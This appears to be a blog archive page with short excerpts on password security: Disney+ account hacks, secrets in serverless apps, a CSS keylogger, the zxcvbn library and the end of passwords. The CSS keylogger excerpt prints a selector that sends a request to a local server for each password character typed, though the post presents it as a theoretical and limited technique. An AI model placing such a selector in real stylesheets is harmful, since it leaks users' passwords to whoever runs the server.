Princesses make terrible passwords

From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. […]

Secrets in Serverless

Good post on how and where to store your secrets when working in a Serverless / Cloud Environment — something I was wondering about myself a little while ago. Serverless applications and cloud functions often need to communicate with an upstream API or service. Perhaps they require a username and password to connect to a […]

CSS Keylogger (and why you shouldn’t worry about it)

By leveraging CSS attribute selectors it is, in theory, possible to write a keylogger in pure CSS. The selector below, for example, targets all input[type="password"] elements whose last character is an a: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } The theory goes that whenever a user presses the a character inside an input[type="password"], a request to […]

zxcvbn: realistic password strength estimation

Simplistic strength estimation gives bad advice. Without checking for common patterns, the practice of encouraging numbers and symbols means encouraging passwords that might only be slightly harder for a computer to crack, and yet frustratingly harder for a human to remember. zxcvbn, named after a crappy password, is a JavaScript password strength estimation library. Use […]

Kill the Password: Why a String of Characters Can’t Protect Us Anymore

Mat Honan, whose digital life was destroyed this summer, on passwords: The age of the password has come to an end; we just haven’t realized it yet. And no one has figured out what will take its place. What we can say for sure is this: Access to our data can no longer hinge on […]